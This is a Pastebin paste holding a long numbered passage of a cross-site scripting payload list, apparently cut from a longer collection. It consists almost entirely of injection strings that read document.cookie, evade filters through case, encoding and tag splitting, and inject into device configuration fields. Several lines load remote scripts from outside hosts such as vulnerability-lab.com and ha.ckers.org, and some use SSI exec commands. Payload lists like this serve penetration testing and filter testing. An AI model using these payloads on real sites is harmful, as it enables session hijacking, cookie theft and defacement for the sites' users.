  352. �><<script>alert(document.cookie);//<</script>
  353. foo<script>alert(document.cookie)</script>
  354. <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
  355. %22/%3E%3CBODY%20onload=�document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)�%3E
  356. �; alert(document.cookie); var foo=�
  357. foo\�; alert(document.cookie);//�;
  358. </script><script >alert(document.cookie)</script>
  359. <img src=asdf onerror=alert(document.cookie)>
  360. <BODY ONLOAD=alert(�XSS�)>
  361. <script>alert(1)</script>
  362. "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
  363. <video src=1 onerror=alert(1)>
  364. <audio src=1 onerror=alert(1)>
  365. <meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
  366. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
  367. <SCRIPT>document.cookie=true;</SCRIPT>
  368. <IMG SRC="jav ascript:document.cookie=true;">
  369. <IMG SRC="javascript:document.cookie=true;">
  370. <IMG SRC="  javascript:document.cookie=true;">
  371. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
  372. <SCRIPT>document.cookie=true;//<</SCRIPT>
  373. <SCRIPT <B>document.cookie=true;</SCRIPT>
  374. <iframe src="javascript:document.cookie=true;>
  375. <SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
  376. </TITLE><SCRIPT>document.cookie=true;</SCRIPT>
  377. <INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
  378. <BODY BACKGROUND="javascript:document.cookie=true;">
  379. <BODY ONLOAD=document.cookie=true;>
  380. <IMG DYNSRC="javascript:document.cookie=true;">
  381. <IMG LOWSRC="javascript:document.cookie=true;">
  382. <BGSOUND SRC="javascript:document.cookie=true;">
  383. <BR SIZE="&{document.cookie=true}">
  384. <LAYER SRC="javascript:document.cookie=true;"></LAYER>
  385. <LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
  386. <STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
  387. �script�document.cookie=true;�/script�
  388. <IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
  389. <FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
  390. <TABLE BACKGROUND="javascript:document.cookie=true;">
  391. <TABLE><TD BACKGROUND="javascript:document.cookie=true;">
  392. <DIV STYLE="background-image: url(javascript:document.cookie=true;)">
  393. <DIV STYLE="background-image: url(javascript:document.cookie=true;)">
  394. <DIV STYLE="width: expression(document.cookie=true);">
  395. <STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
  396. <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
  397. <CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
  398. exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>
  399. <STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
  400. <STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
  401. <STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
  402. <BASE HREF="javascript:document.cookie=true;//">
  403. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
  404. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  405. <XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  406. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
  407. <? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
  408. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
  409. <a href="javascript#document.cookie=true;">
  410. <div onmouseover="document.cookie=true;">
  411. <img src="javascript:document.cookie=true;">
  412. <img dynsrc="javascript:document.cookie=true;">
  413. <input type="image" dynsrc="javascript:document.cookie=true;">
  414. <bgsound src="javascript:document.cookie=true;">
  415. &<script>document.cookie=true;</script>
  416. &{document.cookie=true;};
  417. <img src=&{document.cookie=true;};>
  418. <link rel="stylesheet" href="javascript:document.cookie=true;">
  419. <img src="mocha:document.cookie=true;">
  420. <img src="livescript:document.cookie=true;">
  421. <a href="about:<script>document.cookie=true;</script>">
  422. <body onload="document.cookie=true;">
  423. <div style="background-image: url(javascript:document.cookie=true;);">
  424. <div style="behaviour: url([link to code]);">
  425. <div style="binding: url([link to code]);">
  426. <div style="width: expression(document.cookie=true;);">
  427. <style type="text/javascript">document.cookie=true;</style>
  428. <object classid="clsid:..." codebase="javascript:document.cookie=true;">
  429. <style><!--</style><script>document.cookie=true;//--></script>
  430. <<script>document.cookie=true;</script>
  431. <script>document.cookie=true;//--></script>
  432. <!-- -- --><script>document.cookie=true;</script><!-- -- -->
  433. <img src="blah"onmouseover="document.cookie=true;">
  434. <img src="blah>" onmouseover="document.cookie=true;">
  435. <xml src="javascript:document.cookie=true;">
  436. <xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
  437. <div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
  438. >"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
  439. >"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
  440. >"<SCRIPT>document.cookie=true;</SCRIPT>
  441. >"<IMG SRC="jav ascript:document.cookie=true;">
  442. >"<IMG SRC="javascript:document.cookie=true;">
  443. >"<IMG SRC="  javascript:document.cookie=true;">
  444. >"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
  445. >"<SCRIPT>document.cookie=true;//<</SCRIPT>
  446. >"<SCRIPT <B>document.cookie=true;</SCRIPT>
  447. >"<iframe src="javascript:document.cookie=true;>
  448. >"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
  449. >"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
  450. >"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
  451. >"<BODY BACKGROUND="javascript:document.cookie=true;">
  452. >"<BODY ONLOAD=document.cookie=true;>
  453. >"<IMG DYNSRC="javascript:document.cookie=true;">
  454. >"<IMG LOWSRC="javascript:document.cookie=true;">
  455. >"<BGSOUND SRC="javascript:document.cookie=true;">
  456. >"<BR SIZE="&{document.cookie=true}">
  457. >"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
  458. >"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
  459. >"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
  460. >"�script�document.cookie=true;�/script�
  461. >"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
  462. >"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
  463. >"<TABLE BACKGROUND="javascript:document.cookie=true;">
  464. >"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
  465. >"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
  466. >"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
  467. >"<DIV STYLE="width: expression(document.cookie=true);">
  468. >"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
  469. >"<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
  470. >"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
  471. >"exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>
  472. >"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
  473. >"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
  474. >"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
  475. >"<BASE HREF="javascript:document.cookie=true;//">
  476. >"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
  477. >"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  478. >"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  479. >"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
  480. >"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
  481. >"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
  482. >"<a href="javascript#document.cookie=true;">
  483. >"<div onmouseover="document.cookie=true;">
  484. >"<img src="javascript:document.cookie=true;">
  485. >"<img dynsrc="javascript:document.cookie=true;">
  486. >"<input type="image" dynsrc="javascript:document.cookie=true;">
  487. >"<bgsound src="javascript:document.cookie=true;">
  488. >"&<script>document.cookie=true;</script>
  489. >"&{document.cookie=true;};
  490. >"<img src=&{document.cookie=true;};>
  491. >"<link rel="stylesheet" href="javascript:document.cookie=true;">
  492. >"<img src="mocha:document.cookie=true;">
  493. >"<img src="livescript:document.cookie=true;">
  494. >"<a href="about:<script>document.cookie=true;</script>">
  495. >"<body onload="document.cookie=true;">
  496. >"<div style="background-image: url(javascript:document.cookie=true;);">
  497. >"<div style="behaviour: url([link to code]);">
  498. >"<div style="binding: url([link to code]);">
  499. >"<div style="width: expression(document.cookie=true;);">
  500. >"<style type="text/javascript">document.cookie=true;</style>
  501. >"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
  502. >"<style><!--</style><script>document.cookie=true;//--></script>
  503. >"<<script>document.cookie=true;</script>
  504. >"<script>document.cookie=true;//--></script>
  505. >"<!-- -- --><script>document.cookie=true;</script><!-- -- -->
  506. >"<img src="blah"onmouseover="document.cookie=true;">
  507. >"<img src="blah>" onmouseover="document.cookie=true;">
  508. >"<xml src="javascript:document.cookie=true;">
  509. >"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
  510. >"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
  511. -1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
  512. -1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
  513. -1<SCRIPT>document.cookie=true;</SCRIPT>
  514. -1<IMG SRC="jav ascript:document.cookie=true;">
  515. -1<IMG SRC="javascript:document.cookie=true;">
  516. -1<IMG SRC="  javascript:document.cookie=true;">
  517. -1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
  518. -1<SCRIPT>document.cookie=true;//<</SCRIPT>
  519. -1<SCRIPT <B>document.cookie=true;</SCRIPT>
  520. -1<iframe src="javascript:document.cookie=true;>
  521. -1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
  522. -1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
  523. -1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
  524. -1<BODY BACKGROUND="javascript:document.cookie=true;">
  525. -1<BODY ONLOAD=document.cookie=true;>
  526. -1<IMG DYNSRC="javascript:document.cookie=true;">
  527. -1<IMG LOWSRC="javascript:document.coo�ie=true;">
  528. -1<BGSOUND SRC="javascript:document.cookie=true;">
  529. -1<BR SIZE="&{document.cookie=true}">
  530. -1<LAYER SRC="javascript:document.cookie=true;"></LAYER>
  531. -1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
  532. -1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
  533. -1�script�document.cookie=true;�/script�
  534. -1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
  535. -1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
  536. -1<TABLE BACKGROUND="javascript:document.cookie=true;">
  537. -1<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
  538. -1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
  539. -1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
  540. -1<DIV STYLE="width: expression(document.cookie=true);">
  541. -1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
  542. -1<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
  543. -1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
  544. -1exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>
  545. -1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
  546. -1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
  547. -1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
  548. -1<BASE HREF="javascript:document.cookie=true;//">
  549. -1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
  550. -1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  551. -1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  552. -1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
  553. -1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
  554. -1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
  555. -1<a href="javascript#document.cookie=true;">
  556. -1<div onmouseover="document.cookie=true;">
  557. -1<img src="javascript:document.cookie=true;">
  558. -1<img dynsrc="javascript:document.cookie=true;">
  559. -1<input type="image" dynsrc="javascript:document.cookie=true;">
  560. -1<bgsound src="javascript:document.cookie=true;">
  561. -1&<script>document.cookie=true;</script>
  562. -1&{document.cookie=true;};
  563. -1<img src=&{document.cookie=true;};>
  564. -1<link rel="stylesheet" href="javascript:document.cookie=true;">
  565. -1<img src="mocha:document.cookie=true;">
  566. -1<img src="livescript:document.cookie=true;">
  567. -1<a href="about:<script>document.cookie=true;</script>">
  568. -1<body onload="document.cookie=true;">
  569. -1<div style="background-image: url(javascript:document.cookie=true;);">
  570. -1<div style="behaviour: url([link to code]);">
  571. -1<div style="binding: url([link to code]);">
  572. -1<div style="width: expression(document.cookie=true;);">
  573. -1<style type="text/javascript">document.cookie=true;</style>
  574. -1<object classid="clsid:..." codebase="javascript:document.cookie=true;">
  575. -1<style><!--</style><script>document.cookie=true;//--></script>
  576. -1<<script>document.cookie=true;</script>
  577. -1<script>document.cookie=true;//--></script>
  578. -1<!-- -- --><script>document.cookie=true;</script><!-- -- -->
  579. -1<img src="blah"onmouseover="document.cookie=true;">
  580. -1<img src="blah>" onmouseover="document.cookie=true;">
  581. -1<xml src="javascript:document.cookie=true;">
  582. -1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
  583. -1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
  584. >"<iframe src=http://vulnerability-lab.com/>@gmail.com
  585. >"<script>alert(document.cookie)</script><div style="1@gmail.com
  586. >"<script>alert(document.cookie)</script>@gmail.com
  587. <iframe src=http://vulnerability-lab.com/>@gmail.com
  588. <script>alert(document.cookie)</script><div style="1@gmail.com
  589. <script>alert(document.cookie)</script>@gmail.com
  590. +49/>"<iframe src=http://vulnerability-lab.com>1337
  591. "><iframe src='' onload=alert('mphone')>
  592. <iframe src=http://vulnerability-lab.com>1337+1
  593. >�<ScriPt>ALeRt("VlAb")</scriPt>
  594. >"<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe>
  595. <html><body><button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,110,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:from.Char.Code</button></body></html>
  596. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT>
  597. '';!--"<CrossSiteScripting>=&{()}
  598. %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
  599. %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
  600. %73%63%72%69%70%74%3E
  601. set vlan name 1337 <script>alert(document.cookie)</script>
  602. set system name <iframe src=http://www.vulnerability-lab.com>
  603. set system location "><iframe src=a onload=alert("VL") <
  604. set system contact <script>alert('VL')</script>
  605. insert <script>alert(document.cookie)</script>
  606. add <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"-->
  607. add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com
  608. add topic <iframe src=http://www.vulnerability-lab.com>
  609. add name <script>alert('VL')</script>
  610. perl -e 'print "<IMG SRC=java\0script:alert(\"CrossSiteScripting\")>";' > out
  611. perl -e 'print "<SCR\0IPT>alert(\"CrossSiteScripting\")</SCR\0IPT>";' > out
  612. <!--[if gte IE 4]> <SCRIPT>alert('CrossSiteScripting');</SCRIPT> <![endif]-->
  613. <IMG
  614. SRC
  615. =
  616. "
  617. j
  618. a
  619. v
  620. s
  621. c
  622. r
  623. i
  624. p
  625. t
  626. :
  627. l
  628. e
  629. (
  630. '
  631. V
  632. L
  633. A
  634. B
  635. )
  636. >
  637. <EMBED SRC="http://vulnerability-lab.com/CrossSiteScripting.swf" AllowScriptAccess="always"></EMBED>
  638. <object type="application/x-shockwave-flash" data="http://www.vulnerability-lab.com/hack.swf" width="300" height="300"><param name="movie" value="http://www.subhohalder.com/xysecteam.swf" /><param name="quality" value="high" /><param name="scale" value="noscale" /><param name="salign" value="LT" /><param name="allowScriptAccess" value="always" /><param name="menu" value="false" /></object>
  639. <SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>
  640. <<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT>
  641. <SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js?<B>
  642. <SCRIPT SRC=//vulnerability-lab.com/.js>
  643. <SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT>
  644. <SCRIPT a=">" SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
  645. <SCRIPT a=`>` SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
  646. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
  647. </TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT>
  648. <IMG SRC="javascript:alert('CrossSiteScripting');">
  649. <IMG SRC=javascript:alert('CrossSiteScripting')>
  650. <IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')>
  651. <IMG SRC=javascript:alert("CrossSiteScripting")>
  652. <IMG SRC=`javascript:alert("RM'CrossSiteScripting'")`>
  653. <IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>">
  654. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  655. <IMG SRC="jav ascript:alert('CrossSiteScripting');">
  656. <IMG SRC="jav&#x09;ascript:alert('CrossSiteScripting');">
  657. <IMG SRC="jav&#x0A;ascript:alert('CrossSiteScripting');">
  658. <IMG SRC="jav&#x0D;ascript:alert('CrossSiteScripting');">
  659. <IMG SRC="  javascript:alert('CrossSiteScripting');">
  660. <IMG SRC="javascript:alert('CrossSiteScripting')"
  661. <IMG DYNSRC="javascript:alert('CrossSiteScripting')">
  662. <IMG LOWSRC="javascript:alert('CrossSiteScripting')">
  663. <IMG SRC='vbscript:msgbox("CrossSiteScripting")'>
  664. <IMG SRC="mocha:[code]">
  665. <IMG SRC="livescript:[code]">
  666. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
  667. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');">
  668. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');">
  669. <META HTTP-EQUIV="Link" Content="<http://vulnerability-lab.com/CrossSiteScripting.css>; REL=stylesheet">
  670. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('CrossSiteScripting')</SCRIPT>">
  671. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-
  672. <OBJECT TYPE="text/x-scriptlet" DATA="http://vulnerability-lab.com/scriptlet.html"></OBJECT>
  673. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT>
  674. <STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE>
  675. <STYLE>@import'http://vulnerability-lab.com/CrossSiteScripting.css';</STYLE>
  676. <STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE>
  677. <STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A>
  678. <STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE>
  679. <STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting
  680. <STYLE>BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE>
  681. <DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
  682. <DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
  683. <DIV STYLE="width: expression(alert('CrossSiteScripting'));">
  684. <LAYER SRC="http://vulnerability-lab.com/script.html"></LAYER>
  685. <LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');">
  686. <LINK REL="stylesheet" HREF="http://vulnerability-lab.com/CrossSiteScripting.css">
  687. <BODY BACKGROUND="javascript:alert('CrossSiteScripting')">
  688. <BODY ONLOAD=alert('CrossSiteScripting')>
  689. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("CrossSiteScripting")>
  690. <iframe src=http://vulnerability-lab.com/index.html <
  691. <TABLE BACKGROUND="javascript:alert('CrossSiteScripting')">
  692. <TABLE><TD BACKGROUND="javascript:alert('CrossSiteScripting')">
  693. <BGSOUND SRC="javascript:alert('CrossSiteScripting');">
  694. <BR SIZE="&{alert('CrossSiteScripting')}">
  695. <A HREF="http://server.com/">CrossSiteScripting</A>
  696. <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A>
  697. <A HREF="http://1113982867/">CrossSiteScripting</A>
  698. <A HREF="javascript:document.location='http://www.vulnerability-lab.com/'">CrossSiteScripting</A>
  699. <BASE HREF="javascript:alert('CrossSiteScripting');//">
  700. \";alert('CrossSiteScripting');//
  701. <INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScripting');">
  702. <CrossSiteScripting STYLE="behavior: url(CrossSiteScripting.htc);">
  703. �script�alert(�CrossSiteScripting�)�/script�
  704. <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(alert('CrossSiteScripting'))">
  705. <CrossSiteScripting STYLE="CrossSiteScripting:expression(alert('CrossSiteScripting'))"> exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*"); CrossSiteScripting:ex&#x2F;*CrossSiteScripting*//*/*/pression(alert("CrossSiteScripting"))'>
  706.  
  707. a="get";
  708. b="URL(\"";
  709. c="javascript:";
  710. d="alert('CrossSiteScripting');\")";
  711. eval(v+l+a+b);
  712. <HTML xmlns:CrossSiteScripting>
  713. <?import namespace="CrossSiteScripting" implementation="http://ha.ckers.org/CrossSiteScripting.htc">
  714. <CrossSiteScripting:CrossSiteScripting>CrossSiteScripting</CrossSiteScripting:CrossSiteScripting>
  715. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('CrossSiteScripting');">]]>
  716. </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  717. <XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:alert('CrossSiteScripting')"></B></I></XML>
  718. <SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  719. <XML SRC="CrossSiteScriptingtest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  720. <HTML><BODY>
  721. <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
  722. <?import namespace="t" implementation="#default#time2">
  723. <t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>alert("CrossSiteScripting")</SCRIPT>">
  724. </BODY></HTML>
  725. <SCRIPT SRC="http://vulnerability-lab.com/CrossSiteScripting.jpg"></SCRIPT>
  726. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"-->
  727. <? echo('<SCR)';
  728. echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?>
  729. <IMG SRC="http://www.vulnerability-lab.com/file.php?variables=malicious">
  730. Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser
  731. %3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E
  732. &#x3C;&#x69;&#x66;&#x72;&#x61;&#x6D;&#x65;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;b#x2F;&#x74;&#x65;&#x73;&#x74;&#x2E;&#x64;&#x65;&#x3E;
  733. &#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62
  734. PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!